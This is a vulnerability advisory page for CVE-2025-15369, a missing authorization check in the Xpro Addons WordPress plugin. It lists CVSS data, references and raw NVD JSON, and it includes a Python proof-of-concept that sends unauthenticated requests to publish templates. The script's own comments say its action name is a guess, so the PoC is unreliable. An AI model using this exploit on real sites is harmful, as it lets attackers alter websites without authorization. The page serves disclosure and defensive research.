CVE-2025-15369

Description

The Xpro Addons — 140+ Widgets for Elementor plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the get_content_editor function in all versions up to, and including, 1.5.0. This makes it possible for unauthenticated attackers to create published Xpro templates.

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Xpro Addons — 140+ Widgets for Elementor <= 1.5.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

def exploit(target_url):
    # Target endpoint usually is admin-ajax.php
    url = f"{target_url}/wp-admin/admin-ajax.php"
    
    # Data payload based on the vulnerable function
    # Action name is typically derived from the function name, e.g., xpro_get_content_editor
    payload = {
        "action": "xpro_get_content_editor",
        "template_data": "<h1>Malicious Content</h1>",
        "status": "publish"
    }
    
    try:
        response = requests.post(url, data=payload)
        if response.status_code == 200:
            print("[+] Request sent successfully. Check if template was created.")
            print(f"[+] Response: {response.text}")
        else:
            print(f"[-] Failed to send request. Status code: {response.status_code}")
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    target = "http://example.com" # Replace with actual target
    exploit(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-15369
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-15369
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-15369/
[4] VulDB https://vuldb.com/cve/CVE-2025-15369
[5] https://plugins.trac.wordpress.org/browser/xpro-elementor-addons/trunk?rev=3508547
[6] https://www.wordfence.com/threat-intel/vulnerabilities/id/cf49d3fb-de14-42bc-bf51-f9adceba0d32?source=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-15369", "sourceIdentifier": "[email protected]", "published": "2026-05-20T04:16:42.597", "lastModified": "2026-05-20T13:54:54.890", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Xpro Addons — 140+ Widgets for Elementor plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the get_content_editor function in all versions up to, and including, 1.5.0. This makes it possible for unauthenticated attackers to create published Xpro templates."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/xpro-elementor-addons/trunk?rev=3508547", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/cf49d3fb-de14-42bc-bf51-f9adceba0d32?source=cve", "source": "[email protected]"}]}}